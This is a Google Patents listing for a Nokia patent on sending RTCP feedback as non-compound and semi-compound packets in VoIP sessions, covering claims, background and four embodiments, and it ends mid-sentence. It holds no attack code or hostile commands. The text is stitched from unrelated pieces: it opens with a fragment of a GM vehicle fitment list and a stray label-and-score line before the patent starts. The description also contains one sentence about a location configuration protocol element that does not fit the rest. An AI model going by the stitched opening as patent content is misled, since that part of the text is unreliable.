4.3L • 1988, 1989, 1990, 1991 • Safari 4.3L • 1986, 1987, 1988, 1989, 1990, 1991, 1992, 1993, 1994, 1995 GMC Vehicles: • Sonoma 4.3L • 1991, 1992, 1993, 1994, 1995 • Yukon 5.7L • 1992, 1993, 1994, 1995 Oldsmobile Vehicles: • Bravada 4.3L • 1991, 1992, 1993, 1994, 1995 • Custom Cruiser 5.0L, 5.7L • 1991, 1992 Pontiac Vehicles: • Firebird 2.8L, 3.1L, 5.0L, 5.7L • 1985, 1986, 1987, 1988, 1989, 1990, 1991, 1992 • Grand Prix 4.3L, 5.0L • 1986, 1987
__label__pos
0.924787
Search Images Maps Play YouTube News Gmail Drive More » Sign in Screen reader users: click this link for accessible mode. Accessible mode has the same essential features but works better with your reader. Patents 1. Advanced Patent Search Publication numberUS8391284 B2 Publication typeGrant Application numberUS 12/597,223 PCT numberPCT/IB2008/000988 Publication date5 Mar 2013 Filing date22 Apr 2008 Priority date23 Apr 2007 Fee statusPaid Also published asUS20100135290, WO2008129408A2, WO2008129408A3 Publication number12597223, 597223, PCT/2008/988, PCT/IB/2008/000988, PCT/IB/2008/00988, PCT/IB/8/000988, PCT/IB/8/00988, PCT/IB2008/000988, PCT/IB2008/00988, PCT/IB2008000988, PCT/IB200800988, PCT/IB8/000988, PCT/IB8/00988, PCT/IB8000988, PCT/IB800988, US 8391284 B2, US 8391284B2, US-B2-8391284, US8391284 B2, US8391284B2 InventorsIgor Danilo Diego Curcio Original AssigneeNokia Corporation Export CitationBiBTeX, EndNote, RefMan External Links: USPTO, USPTO Assignment, Espacenet Usage of feedback information for multimedia sessions US 8391284 B2 Abstract An apparatus and method configure RTCP packets in a control feedback handling in multimedia sessions. The apparatus and method are configured to provide sending of any RTCP individual packet as a non-compound RTCP packet an order within a time interval. The apparatus and method are configured so that an excessive length of compound RTCP packets are handled by fragmenting each compound RTCP packet in smaller non-compound packets and sending it spaced over time. The apparatus and method guarantee RTCP non-compound packets to provide an equivalent functionality as the RTCP compound packets by providing the same information to the receiver, and the receiver does not lack any feedback information. The apparatus and method are also configured to use semi-compound RTCP packets, where at least two non-compound/individual RTCP packets (but less than all the non-compound/individual RTCP packets that would be sent as compound packet) are sent together as a semi-compound RTCP packet. Images(9) Previous page Next page Claims(20) 1. An apparatus, comprising: a controller configured to fragment a compound real-time transport control protocol packet into a plurality of non-compound real-time transport control protocol packets and to define one of the non-compound real-time transport control protocol packets as comprising at least one of a sender report, a receiver report and a session description protocol security description for media streams; and a transmitter configured to transmit the at least one non-compound real-time transport control protocol packet in a sample order within a defined interval. 2. The apparatus of claim 1, wherein at least one of the non-compound real-time transport control protocol packets further comprises at least one of an application defined real-time transport control protocol packet, or an individual real-time transport control protocol packet. 3. The apparatus of claim 1, wherein the defined time interval comprises a round trip time, a cyclic order, or a real-time transport control protocol interval time; and wherein the sample order comprises a cyclic order, which comprises an application defined real-time transport control protocol non-compound packet with some adaptation information, a real-time transport control protocol sender report packet, and a security description for media streams packet. 4. The apparatus of claim 1, wherein the controller is further configured to define a second packet as a real-time transport protocol packet; and wherein the transmitter is further configured to transmit the real-time transport protocol packet. 5. The apparatus of claim 4, wherein the real-time transport protocol packet is encapsulated in Internet protocol packet; and wherein the internet protocol packet comprises a plurality of real-time transport protocol packets. 6. The apparatus of claim 4, wherein the transmitter is further configured to transmit the non-compound real-time transport control protocol packet and the real-time transport protocol packet within a same packet data protocol context and radio bearer. 7. The apparatus of claim 4, wherein the real-time transport protocol packet comprises a fixed real-time transport protocol header, a list of contribution sources, and payload data, wherein the list of contributing sources can be empty. 8. The apparatus of claim 1, wherein the non-compound real-time transport control protocol packet is encapsulated in an internet protocol packet; and wherein the internet protocol packet comprises a plurality of non-compound real-time transport control protocol packets, as a compound real-time transport control protocol packet. 9. A method, comprising: fragmenting a compound real-time transport control protocol packet into a plurality of non-compound real-time transport control protocol packets; defining one of the plurality of the non-compound real-time transport control protocol packets to comprise at least one of a sender report, a receiver report and a session description protocol security description for media streams; and transmitting the non-compound real-time transport control protocol packets in a sample order within a defined time interval. 10. The method of claim 9, wherein at least one of the non-compound real-time transport control protocol packets further comprises at least one of an application defined real-time transport control protocol packet, or an individual real-time transport control protocol packet. 11. The method of claim 9, wherein the defined time interval comprises a round trip time, a cyclic order, or a real-time transport control protocol interval time; and wherein the sample order comprises a cyclic order, which comprises an application defined real-time transport control protocol non-compound packet with some adaptation information, a real-time transport control protocol sender report packet, and a security description for media streams packet. 12. The method of claim 9, further comprising: generating a real-time transport protocol packet; and transmitting the real-time transport protocol packet. 13. The method of claim 12, wherein the real-time transport protocol packet is encapsulated in an internet protocol packet; and wherein the internet protocol packet comprises a plurality of real-time transport protocol packets. 14. The method of claim 12, wherein the transmitting further comprises transmitting the non-compound real-time transport control protocol packet and the real-time transport protocol packet within a same packet data protocol context and radio bearer. 15. The method of claim 12, wherein the real-time transport protocol packet comprises a fixed real-time transport protocol header, a list of contribution sources, and payload data, wherein the list of contributing sources is capable of being empty. 16. The method of claim 9, further comprising encapsulating the non-compound real-time transport control protocol packet in an internet protocol packet; and wherein the internet protocol packet comprises a plurality of non-compound real-time transport control protocol packets, as a compound real-time transport control protocol packet. 17. A non-transitory computer-readable medium that contains a computer program, the computer program is executed by a processor to implement a method, the method comprising: fragmenting a compound real-time transport control protocol packet into a plurality of non-compound real-time transport control protocol packets; defining one of the plurality of the non-compound real-time transport control protocol packets to comprise at least one of a sender report, a receiver report and a session description protocol security description for media streams; and transmitting the non-compound transport control protocol packet in a sample order within a defined time interval. 18. The non-transitory computer-readable medium of claim 17, wherein at least one of the non-compound real-time transport control protocol packets further comprises at least one of an application defined real-time transport control protocol packet, or an individual real-time transport control protocol packet. 19. The non-transitory computer-readable medium of claim 17, wherein the defined time interval comprises a round trip time, a cyclic order, or a real-time transport control protocol interval time; and wherein the sample order comprises a cyclic order, which comprises an application defined real-time transport control protocol non-compound packet with some adaptation information, a real-time transport control protocol sender report packet, and a security description for media streams packet. 20. The non-transitory computer-readable medium of claim 17, wherein the method further comprising: generating a second packet as a real-time transport protocol packet; and transmitting the real-time transport protocol packet. Description RELATED APPLICATION This application was originally filed as PCT Application No. PCT/IB2008/000988 filed Apr. 22, 2008 which claims priority to U.S. Provisional Application No. 60/907,938 filed Apr. 23, 2007. CROSS REFERENCE TO RELATED APPLICATIONS This application claims priority of U.S. Provisional Patent Application Ser. No. 60/907,938, filed on Apr. 23, 2007. The subject matter of the earlier filed application is hereby incorporated by reference. BACKGROUND OF THE INVENTION 1. Field of the Invention The present invention relates to an apparatus and method to transmit voice and other multimedia information over a network. In particular, an apparatus and method are provided which configure real time transport control protocol packets in a control feedback handling in multimedia sessions. 2. Description of the Related Art Multimedia data is distributed by, for example, multimedia protocols. Real-time transport protocol (RTP) uses universal datagram protocol (UDP) as a transport protocol appropriate for transmission of streaming data; because UDP provides a fast transmission although not reliable like it is the case by transmission control protocol (TCP). Hypertext transport protocol (HTTP) and real-time streaming protocol (RTSP) run over the reliable TCP. The RTSP provides session control for streaming sessions. HTTP can be used for transmission of still images, bitmap graphics and text. The RTP can provide end-to-end network transport functions suitable for applications transmitting real-time data, such as audio, video or simulation data, over multicast or unicast network services. The functions provided by RTP include payload type identification, sequence numbering, timestamping, and delivery monitoring. The RTP contains a related RTP Control Protocol (RTCP) augmenting the data transport, which is used to monitor a quality of service (QoS) and to convey information about the participants in an ongoing session. Each media stream in a conference is transmitted as a separate RTP session with a separate RTCP stream. RTP adds a time stamp and a sequence number to each UDP packet in a special RTP header. The time stamp is related to the sampling or the presentation or composition time of the media carried in the payload of the RTP packet. It is used for playing back media at the correct speed, and together with RTCP, it can be used for synchronizing the presentation of other streaming media. A payload specification defines the interpretation of the time stamp and other RTP fields. The recipient can use the sequence number to detect the loss of packets statistics on loss can be reported to the server by means of RTCP. RTCP reports are capable of providing statistics about the data received from a particular source, such as the number of packets lost since the previous report, the cumulative number of packets lost, the interarrival jitter, etc. The RTCP control protocol is based on the periodic transmission of control packets to all participants in the session, using the same distribution mechanism as the data packets. The underlying protocol provides multiplexing of the data and control packets, for example using separate port numbers with UDP. An apparatus and method are needed in which an excessive length of compound RTCP packets may be handled by fragmenting each compound RTCP packet in smaller non-compound packets and sending it spaced over time. The apparatus and method would guarantee RTCP non-compound packets to provide an equivalent functionality as the RTCP compound packets by providing the same information to the receiver (SR, RR, SDES, etc.), and the receiver would not lack any feedback information. SUMMARY OF THE INVENTION Embodiments of the invention can provide an apparatus, which includes a controller configured to define a first packet as a non-compound real-time transport control protocol packet. The controller is further configured to define the non-compound real-time transport control protocol packet to comprise at least one of a sender report, a receiver report, a session description protocol security description for media streams, an application defined real-time transport control protocol packet, or an individual real-time transport control protocol packet. The apparatus further includes a transmitter configured to transmit the non-compound real-time transport control protocol packet in a sample order within a defined interval. Furthermore, embodiments of the invention can provide a method, which includes configuring a first packet as a non-compound real-time transport control protocol packet. The method further includes configuring the non-compound real-time transport control protocol packet to comprise at least one of a sender report, a receiver report, a session description protocol security description for media streams, an application defined real-time transport control protocol packet, or an individual real-time transport control protocol packet. The method further includes transmitting the non-compound real-time transport control protocol packet in a sample order within a defined time interval. Furthermore, embodiments of the invention can provide an apparatus, which includes a controller configured to define a real-time transport control protocol packet as either a compound real-time transport control protocol packet or a non-compound real-time transport control protocol packet. The controller is further configured to define a limit on a size of a real-time transport control protocol packet to be at most as large as N times a size of a speech packet size. The size of the speech packet size corresponds to a highest of speech codec modes used in a session. Furthermore, embodiments of the invention can provide a method, which includes defining a real-time transport control protocol packet as either a compound real-time transport control protocol or a non-compound real-time transport control protocol. The method further includes determining whether the speech packet size includes headers; if the speech packet size includes headers. The method further includes determining whether the headers are compressed. The method further includes defining a limit on the size of the real-time transport control protocol packet to be at most as large as N times the size of the speech packet size. The size of the speech packet size corresponds to a highest of the speech codec modes used in a session. Furthermore, embodiments of the invention can provide an apparatus, which includes a receiver configured to receive a non-compound real-time transport control protocol packet from a receiver terminal. The apparatus further includes a controller configured to insert information in a real time transport protocol packet and/or the non-compound real-time transport control protocol packet. The information includes a positive acknowledgement indicative that the sender terminal has received the non-compound real-time transport control protocol packet. The apparatus further includes a transmitter configured to transmit the real time transport protocol packet and/or the non-compound real-time transport control protocol packet to the receiver terminal. The receiver terminal determines that the information comprises the positive acknowledgement indicative that the sender terminal has received the non-compound real-time transport control protocol packet. Furthermore, embodiments of the invention can provide a method, which includes receiving a non-compound real-time transport control protocol packet, at a sender terminal. The method further includes, upon reception of the first non-compound real-time transport control protocol packet, inserting information in a real time transport protocol packet and/or the non-compound real-time transport control protocol packet. The information includes a positive acknowledgement indicative that the sender terminal has received the non-compound real-time transport control protocol packet. The method includes transmitting the real time transport protocol packet and/or the non-compound real-time transport control protocol packet to a receiver terminal. The receiver terminal determines that the information comprises the positive acknowledgement indicative that the sender terminal has received the non-compound real-time transport control protocol packet. Furthermore, embodiments of the invention can provide an apparatus, which includes a determiner configured to determine that a radio bearer allows the sending of more than one non-compound real-time transport control protocol packet, but does not allows the sending of a compound real-time transport control protocol packet. The apparatus further includes a controller configured to define a real-time transport control protocol packet as a semi-compound real-time transport control protocol packet. The semi-compound real-time transport control protocol packet includes at least two non-compound real-time transport control protocol packets, but less than all the non-compound real-time transport control protocol packets that would be sent as a compound real-time transport control protocol packet. The apparatus further includes a transmitter configured to transmit the semi-compound real-time transport control protocol packet. Furthermore, embodiments of the invention can provide a method, which includes determining that a radio bearer allows the sending of more than one non-compound real-time transport control protocol packet, but does not allows the sending of a compound real-time transport control protocol packet. The method further includes configuring a real-time transport control protocol packet as a semi-compound real-time transport control protocol packet. The semi-compound real-time transport control protocol packet includes at least two non-compound real-time transport control protocol packets, but less than all the non-compound real-time transport control protocol packets that would be sent as a compound real-time transport control protocol packet. The method further includes transmitting the semi-compound real-time transport control protocol packet. Furthermore, embodiments of the invention can provide a computer program embodied on a computer-readable medium, the computer program configured to control a processor to implement a method. The method includes configuring a first packet as a non-compound transport control protocol packet. The method further includes configuring the non-compound transport control protocol packet to comprise at least one of a sender report, a receiver report, a session description protocol security description for media streams, an application defined real-time transport control protocol packet, or an individual real-time transport control protocol packet. The method further includes transmitting the non-compound transport control protocol packet in a sample order within a defined time interval. Furthermore, embodiments of the invention can provide a computer program embodied on a computer-readable medium, the computer program configured to implement a method. The method includes defining a real-time transport control protocol packet as either a compound real-time transport control protocol or a non-compound real-time transport control protocol. The method further includes determining whether the speech packet size includes headers. The method further includes, if the speech packet size includes headers, determining whether the headers are compressed. The method further includes defining a limit on the size of the real-time transport control protocol packet to be at most as large as N times the size of the speech packet size. The size of the speech packet size corresponds to a highest of the speech codec modes used in a session. Furthermore, embodiments of the invention can provide a computer program embodied on a computer-readable medium, the computer program configured to implement a method. The method includes receiving a non-compound real-time transport control protocol packet, at a sender terminal. The method further includes, upon reception of the first non-compound real-time transport control protocol packet, inserting information in a real time transport protocol packet and/or the non-compound real-time transport control protocol packet. The information includes a positive acknowledgement indicative that the sender terminal has received the non-compound real-time transport control protocol packet. The method includes transmitting the real time transport protocol packet and/or the non-compound real-time transport control protocol packet to a receiver terminal. The receiver terminal determines that the information comprises the positive acknowledgement indicative that the sender terminal has received the non-compound real-time transport control protocol packet. Furthermore, embodiments of the invention can provide a computer program embodied on a computer-readable medium, the computer program configured to implement a method. The method includes determining that a radio bearer allows the sending of more than one non-compound real-time transport control protocol packet, but does not allows the sending of a compound real-time transport control protocol packet. The method further includes configuring a real-time transport control protocol packet as a semi-compound real-time transport control protocol packet. The semi-compound real-time transport control protocol packet includes at least two non-compound real-time transport control protocol packets, but less than all the non-compound real-time transport control protocol packets that would be sent as a compound real-time transport control protocol packet. The method further includes transmitting the semi-compound real-time transport control protocol packet. BRIEF DESCRIPTION OF THE DRAWINGS Further embodiments, details, advantages and modifications of the present invention will become apparent from the following detailed description of the preferred embodiments which is to be taken in conjunction with the accompanying drawings, in which: FIG. 1 illustrates a graphical representation of a real time transport protocol (RTP) control protocol (RTCP) feedback. FIG. 2 illustrates an example of a conversation session between two terminals using VoIP. FIG. 3 illustrates the size differences between RTP and RTCP packets. FIG. 4 depicts an example embodiment of a terminal according to the present invention. FIG. 5 illustrates a flow diagram of an RTCP configuration, in accordance with a first embodiment of the present invention. FIG. 6 illustrates a flow diagram limiting a size of an RTCP packet, in accordance with a second embodiment of the present invention. FIG. 7 illustrates a method to verify the delivery of non-compound RTCP packet from a receiver to a sender terminal, in accordance with a third embodiment of the present invention. FIG. 8 illustrates a method to process semi-compound RTCP packets, in accordance with a fourth embodiment of the present invention. DETAILED DESCRIPTION OF THE PREFERRED EMBODIMENTS One of the functions of RTCP is to provide feedback on the quality of the data distribution. This is a part of the RTP's role as a transport protocol and is related to the flow and congestion control functions of other transport protocols. The feedback may be directly useful to diagnose faults in the distribution. Sending reception feedback reports to all participants allows one who is observing problems to evaluate whether those problems are local or global. With a distribution mechanism like IP multicast, it is also possible for an entity such as a network service provider who is not involved in the session to receive the feedback information and act as a third-party monitor to diagnose network problems. This feedback function is performed by the RTCP sender and receiver reports. The RTCP specification requires that all participants send RTCP packets, therefore the rate must be controlled in order for RTP to scale up to a large number of participants. By having each participant sending its control packets to all the others, each can independently observe the number of participants. This number is used to calculate the rate at which the packets are sent. Several alternatives have been considered in the past years in other several 3GPP Working Groups to overcome a basic problem in VoIMS (voice over Internet protocol multimedia subsystem) of an uncontrolled nature of the RTCP traffic, and its possible impact on the RTP traffic, which carries voice data: 1. Removal of RTCP for VoIMS 2. RTP and RTCP carried over separate PDP contexts and radio bearers 3. RTP frame stealing (prioritizing RTCP over RTP) In addition to the previous alternatives, there have been in the past also other proposals: 4. Segmentation and concatenation over the radio interface 5. RB/TrCH/PhyCH Reconfiguration 6. Allocation of secondary scrambling code These methods are primarily for the downlink only (it is assumed that in uplink the bearer can be over-dimensioned). In general, the three above-mentioned radio access level solutions are specific to UTRAN (i.e., not applicable to GERAN, e.g., the usage of the secondary scrambling code), and/or they are not applicable in legacy networks (e.g., the reconfiguration). Recently, a proposal to use RTCP non-compound packets has been done in Internet engineering task force (IETF) and third generation partnership project (3GPP). The RTP protocol mandates the usage of compound RTCP packets. Compound RTCP packets are made of at least two individual RTCP packets that contain at least a Sender Report (SR) or Receiver Report (RR), and an SDES packet with the CNAME field. Some proposals suggest to remove the constraints of sending compound RTCP packets and to allow sending non-compound RTCP packets to reduce the size of RTCP packets over a mobile network link and remove or decrease the side effects given by large RTCP packets. FIG. 1 illustrates a graphical representation of the RTCP feedback possibilities within multimedia telephony service for IP multimedia subsystem (MTSI) speech-only sessions. Note that the sum of x % and y % makes the total 100% feedback within a session. Reference will now be made in detail to preferred embodiments of the present invention, examples of which are illustrated in the accompanying drawings. In accordance with an embodiment of the present invention, there is provided an apparatus, a system, and a method to define a location configuration protocol information element within a network. Embodiments of the present invention relate to an apparatus and method to transmit voice and other multimedia information over a network. In particular, an apparatus and method can be provided configuring real time transport control protocol packets in voice over Internet protocol (VoIP) control feedback handling in multimedia sessions. Embodiments of the present invention relate to an apparatus and method configuring real time transport control protocol packets in a control feedback handling in multimedia sessions. The apparatus and method can also be configured to provide sending of any real time transport control protocol individual packet as a non-compound real time transport control protocol packet an order within a time interval. The apparatus and method can be further configured so that an excessive length of compound real time transport control protocol packets are handled by fragmenting each compound real time transport control protocol packet in smaller non-compound packets and sending it spaced over time. The apparatus and method can guarantee real time transport control protocol non-compound packets to provide an equivalent functionality as the real time transport control protocol compound packets by providing the same information to the receiver, and the receiver does not lack any feedback information. Embodiments of the present invention relate to an apparatus and method to use semi-compound real time transport control protocol packets, where at least two non-compound/individual real time transport control protocol packets (but less than all the non-compound/individual real time transport control protocol packets that would be sent as compound packet) are sent together as a semi-compound real time transport control protocol packet. The framework of an embodiment of the invention is the transmission system of real-time voice related data over VoIP. In third generation partnership project IP multimedia subsystem (3GPP IMS) networks, this framework is referred to as VoIMS (voice over Internet protocol multimedia subsystem) or MTSI. In 3GPP IMS (IP multimedia subsystem) networks, this is also called VoIMS or MTSI. Voice calls can be either point-to-point or conferencing calls. The present invention may also apply to point-to-multipoint voice connections and video telephony connections, where also other medium other than voice may be carried (for instance, video). FIG. 2 illustrates an example of a conversation session between two terminals 1, 2 using VoIP. In this non-limiting example, the terminals 1, 2 are communicating with each other via a wireless communication network 3 and the internet 4. The communication is based on packet transmission using a real-time transport protocol (RTP). The RTP packets are encapsulated in packets of a lower layer protocol, such as Internet Protocol (IP). A packet data protocol (PDP) context is created for the VoIP session. The wireless communication network reserves some network resources for the PDP context. These network resources are called as radio bearers in third generation partnership project (3GPP) wireless communication systems. During the conversation audio information such as speech is converted into digital form in the terminals 1, 2. The digital data is then encapsulated to form packets which can be transmitted via the networks to the terminal on the other side of the connection. That terminal receives the packets and performs steps to recover the audio information. In the following, it is assumed that the RTP and real-time control protocol (RTCP) traffic are carried in the same PDP context and radio bearer. The RTP can provide end-to-end delivery services for data with real-time characteristics, such as interactive audio and video. Those services include payload type identification, sequence numbering, time stamping and delivery monitoring. Applications can run RTP on top of UDP to make use of its multiplexing and checksum services; both protocols contribute parts of the transport protocol functionality. However, RTP may be used with other suitable underlying network or transport protocols. RTP supports data transfer to multiple destinations using multicast distribution if provided by the underlying network. The audio conferencing application used by each conference participant can send audio data in small chunks of, for example, 20 ms duration. Each chunk of audio data is preceded by an RTP header; RTP header and data are in turn contained in a UDP packet. The RTP header indicates what type of audio encoding (such as AMR, AMR-WB, PCM, ADPCM or LPC) is contained in each packet so that senders can change the encoding during a conference, for example, to accommodate a new participant that is connected through a low-bandwidth link or react to indications of network congestion. If both audio and video media are used in a conference, they can be transmitted as separate RTP sessions. That is, separate RTP and RTCP packets can be transmitted for each medium using two different UDP port pairs and/or multicast addresses. There is no direct coupling at the RTP level between the audio and video sessions, except that a user participating in both sessions should use the same distinguished (canonical) name in the RTCP packets for both so that the sessions can be associated. One motivation for this separation is to allow some participants in the conference to receive only one medium if they choose. Despite the separation, synchronized playback of a source's audio and video can be achieved using timing information carried in the RTCP packets for both sessions. An RTP packet is a data packet which includes the fixed RTP header, a possibly empty list of contributing sources, and the payload data. RTP payload is the data transported by RTP in a packet, for example audio samples or compressed video data. Some underlying protocols may require an encapsulation of the RTP packet to be defined. Typically one packet of the underlying protocol contains a single RTP packet, but several RTP packets may be contained if permitted by the encapsulation method. The RTP control protocol (RTCP) is based on the periodic transmission of control packets to all participants in the session, using the same distribution mechanism as the data packets. The underlying protocol should provide multiplexing of the data and control packets, for example using separate port numbers with UDP. RTCP can perform numerous functions, including: 1. Providing feedback on the quality of the data distribution. This is a part of the RTP's role as a transport protocol and is related to the flow and congestion control functions of other transport protocols. The feedback may be directly useful for control of adaptive encodings, but experiments with IP multicasting have shown that it is also critical to get feedback from the receivers to diagnose faults in the distribution. Sending reception feedback reports to all participants allows one who is observing problems to evaluate whether those problems are local or global. With a distribution mechanism like IP multicast, it is also possible for an entity such as a network service provider who is not otherwise involved in the session to receive the feedback information and act as a third-party monitor to diagnose network problems. This feedback function is performed by the RTCP sender and receiver reports. 2. RTCP carries a persistent transport-level identifier for an RTP source called the canonical name or CNAME. 3. The first two functions can require that all participants send RTCP packets, therefore the rate must be controlled in order for RTP to scale up to a large number of participants. By having each participant send its control packets to all the others, each can independently observe the number of participants. This number is used to calculate the rate at which the packets are sent. 4. A fourth, optional function is to convey minimal session control information, for example participant identification to be displayed in a user interface of a terminal. An RTCP packet is a control packet which includes a fixed header part similar to that of RTP data packets, followed by structured elements that vary depending upon the RTCP packet type. Typically, multiple RTCP packets are sent together as a compound RTCP packet in a single packet of the underlying protocol; this is enabled by the length field in the fixed header of each RTCP packet. The Internet, like other packet networks, occasionally loses and reorders packets and delays them by variable amounts of time. To cope with these impairments, the RTP header contains timing information and a sequence number that allow the receivers to reconstruct the timing produced by the source, so that, for example, chunks of audio are contiguously played out the speaker every 20 ms. This timing reconstruction is performed separately for each source of RTP packets in the conference. The sequence number can also be used by the receiver to estimate how many packets are being lost. FIG. 3 illustrates RTP and RTCP traffic inter-dependency in VoIMS. It is assumed that RTP and RTCP traffic are carried in the same PDP context and radio bearer. The basic problem in VoIMS is given by the uncontrolled nature of the RTCP traffic, and its possible impact on the RTP traffic, which carries voice data. As illustrated in FIG. 3, RTP/UDP/IPv6 headers of the RTP packets are compressed using ROHC RTP/UDP/IP profile, and the UDP/IPv6 headers of the RTCP packets using ROHC UDP/IP profile. FIG. 3 shows that, the length of RTCP packets can be much larger than the length of RTP packets. Every RTP packet is sent during one 20 ms Transmission Time Interval (TTI). The transmission of one RTCP packet covers multiple transmission time intervals. Since the transmission of RTP and RTCP occurs on the same radio bearer, RTCP packets may cause RTP packets to be delayed or even lost (depending on the RLC discard timer). Ultimately, this produces impairment of the perceived speech quality. In the above described example it is assumed that the bearer is dimensioned for (maximum) 12.2 kbps AMR mode (RTP payload 32 bytes), so that there is room for ROHC First Order (FO) header and PDCP header, together maximum of 9 bytes. It is noted here that the maximum size of the FO header depends on the ROHC implementation. Also, occasional ROHC feedback headers may increase the size of the ROHC header. The dimensioning of the bearer may be somewhat higher or lower, depending on the assumed ROHC header size and depending on the allowed delay. The example presented the case in UTRAN, with usage of ROHC. The same conclusions can be drawn without usage of ROHC. A similar situation holds also in GSM Edge Radio Access Network (GERAN) networks: instead of the TTI concept, there are a fixed number of time slots reserved for the transmission of the header compressed RTP packet once in 20 ms (e.g., one time slot in each of the consecutive 4 or 5 TDMA frames of 4.615 ms duration). FIG. 4 depicts an example embodiment of a terminal according to the present invention. The terminal 1 includes an audio-to-electric converter 1.1 such as a microphone, an electric-to-audio converter 1.2 such as a loudspeaker, and a codec 1.3 for performing encoding and decoding operations for audio. The terminal also includes a voice activity detector 1.4 which tries to determine whether there is speech going on or pauses in the speech (i.e., silence). The determination may be performed on the basis of analog signal from the signals received from the audio-to-electric converter 1.1, or on the basis of digital speech information provided by the codec 1.3. In the latter case, the codec, which can be adaptive multi-rate (AMR) codec or adaptive multi-rate wireband (AMR-WB) codec, forms frames of the speech and attaches a frame type indication to the frame. Therefore, silence is detectable by the sending terminal by e.g. looking at the Frame Type field in the payload Table of Contents of the AMR or AMR-WB RTP streams. The terminal can also include a control block 1.5 to control the operations of the terminal 1. It is possible to send RTCP packets during the silence periods with no impact on the speech quality. During the silence periods, RTCP packets of normal size can be used. However, due to the unpredictability of the silence length, it is normally better to use short RTCP packets than long RTCP packets. This minimizes the impact of RTCP packet transmission on the RTP flow in case the RTCP packet is sent just before the silence period is over. This approach may produce delay/loss of silence descriptor (SID) packets, but this fact has no significant negative impact on the speech quality. In addition, the impact of lost/delayed SID packets is really minimal as the RTP packet rate during silence periods is much smaller than 50 packets per second, and many of the transmission time interval slots are freely usable for RTCP data. In an example of the present invention, the scheduling of RTCP packets can be modified, when necessary, as explained in the previous section in this way. When the voice activity detector 1.4 determines that there is a pause (silence period) in the speech, the rescheduling is performed. For example, in the control block 1.5, if there is a RTCP packet waiting for transmission and the transmission of such a packet is scheduled to happen at a future time, then the transmission of that RTCP packet is initiated, i.e. the RTCP packet is sent substantially immediately (or at any point of time during the silence period) after the silence period is detected. In addition to that, in this non-limiting example, if there is another RTCP packet waiting for transmission, the next RTCP packet is re-scheduled with a time offset from the just sent RTCP packet. This procedure can also be expressed as a pseudo code: If ((RTCP packet is scheduled at a future time) and (silence period occurs immediately)) then {RTCP packet is sent during the silence period; the next RTCP packet is re-scheduled with a time offset from the just sent RTCP packet}. In accordance with a first embodiment of the present invention, when RTCP non-compound packets are used and the RTCP transmission interval for non-compound packets is too large, the non-compound packets may not be used at all, or used very rarely. If this is the case, the benefits of RTCP compound are almost null, but there is still the need of reporting to the sender important information (e.g., sender report (SR), receiver report (RR), session description protocol security descriptions for media streams (SDES), and application defined RTCP packet (APP) or other individual RTCP packets). Therefore, in order to guarantee the correct operation of RTCP, in accordance with an embodiment of the present invention, the apparatus and method of the present invention allow sending of any RTCP individual packet (not just APP packets for adaptation) as a non-compound RTCP packet in any possible order within a certain time interval (e.g., within a round trip time (RTT), or the RTCP transmission interval time). One possible example order is a cyclic order, in which it is sent an RTCP APP non-compound packet with some adaptation information, then it is sent an RTCP SR packet; and then it is sent an SDES packet. Other orders are possible. FIG. 5 illustrates a flow diagram of an RTCP configuration, in accordance with a first embodiment of the present invention. At step 500, the method configures the RTCP packet as a non-compound RTCP packet. At step 510, the method configures the non-compound RTCP packet with reporting or adaptation information, including but not limited to, an SR, an RR, an SDES, an application defined RTCP packet (APP), or other individual RTCP packets. At step 520, the method transmits the non-compound RTCP packet with the information in a predetermined order within a certain time interval. The predetermined order may be configured as any possible order. At step 530, the method transmits an RTCP SR packet; and, at step 540, the method transmits an SDES packet. Other orders are possible. In accordance with a second embodiment of the present invention, for multi-rate VoIMS sessions, that is, sessions where a speech codec can operate according to a certain number of modes (or bit-rates—for example an adaptive multi-rate (AMR) codec has eight modes corresponding to eight different bit rates), a bearer may be dimensioned to carry the highest of the modes. A one-to-one mapping between speech packets and data link layer frames can, therefore, be maintained. In order to maintain the same mapping for RTCP packets (or to limit the negative influence of the RTCP traffic on the RTP traffic), a limit on a size of RTCP packets can be established by the apparatus and method of the present invention. The limit on the size of the RTCP packet may be defined as the size of the RTCP packets (compound or non-compound) to be at most as large as N times the size of the speech packet size, where the size of the speech packet size may correspond to a highest of the speech codec modes used in the session (for instance, the highest of the speech codec mode or the highest of any used subset of the mentioned codec modes). A person of ordinary skill in the art will appreciate that other limits may be established for the size of the RTCP packet in relation to the size of the speech packet size. In accordance to an embodiment of the present invention, N can be, for example, two or more. The speech packet size may or may not include RTP/UDP/IP headers, and the RTP/UDP/IP headers may or may not be compressed. FIG. 6 illustrates a flow diagram limiting a size of an RTCP packet, in accordance with the second embodiment of the present invention. At step 600, the method defines the RTCP packet as compound or non-compound. At step 610, the method determines whether the speech packet size includes RTP/UDP/IP headers. At step 620, if the speech packet size includes the RTP/UDP/IP headers, the method determines whether the RTP/UDP/IP headers are compressed. At step 630, the method defines a limit on the size of the RTCP packet to be at most as large as N times the size of the speech packet size, where the size of the speech packet size may correspond to a highest of the speech codec modes used in the session. In accordance with a third embodiment of the present invention, an apparatus and method to verify a delivery of non-compound RTCP packet from a receiver to a sender terminal, is provided. The sender terminal, upon reception of an RTCP non-compound packet may respond to the receiver by inserting some type of information that serves as a positive acknowledgement (for instance, a confirmation binary flag, or a timestamp, a packet type of the just received non-compound packet, etc.) in the RTP and/or RTCP non-compound packets that may be sent to the receiver during the session. A positive acknowledgement in the information from the sender terminal to the receiver would be an indication that the sender terminal has received the RTCP non-compound packet. A person of ordinary skill in the art may appreciate that sender may repeat the sending of this positive acknowledgement in subsequent packets in order to guarantee that the receiver receives it even under bad radio conditions. FIG. 7 illustrates a method to verify the delivery of non-compound RTCP packet from a receiver to a sender terminal, in accordance with the third embodiment of the present invention. At step 700, the method receives an RTCP non-compound packet at the sender terminal from the receiver. Upon reception of the RTCP non-compound packet, at step 710, the method may respond to the receiver by inserting some type of information in the RTP and/or RTCP non-compound packets that may be sent to the receiver from the sender terminal during the session. At step 720, the method reads the information in the RTP and/or RTCP non-compound packets. At step 730, the method determines that the information includes a positive acknowledgement from the sender terminal indicative that the sender terminal received the RTCP non-compound packet. A person of ordinary skill in the art may appreciate that sender may repeat the sending of this positive acknowledgement in subsequent packets in order to guarantee that the receiver receives it even under bad radio conditions. A person of ordinary skill in the art will appreciate that the apparatus and method illustrated in the third embodiment of the present invention may be performed in reverse. That is, the receiver may perform the functions described above performed by the sender and the sender may perform the functions described above performed by the receiver. In accordance with a fourth embodiment of the present invention, if a bearer allows to send more than just a single individual non-compound RTCP packet, but the bearer does not allow to send the full compound RTCP packet (because of delay or losses reasons), an apparatus and method may be configured in which it would be possible to configure and use semi-compound RTCP packets, where at least two non-compound/individual RTCP packets (but less than all the 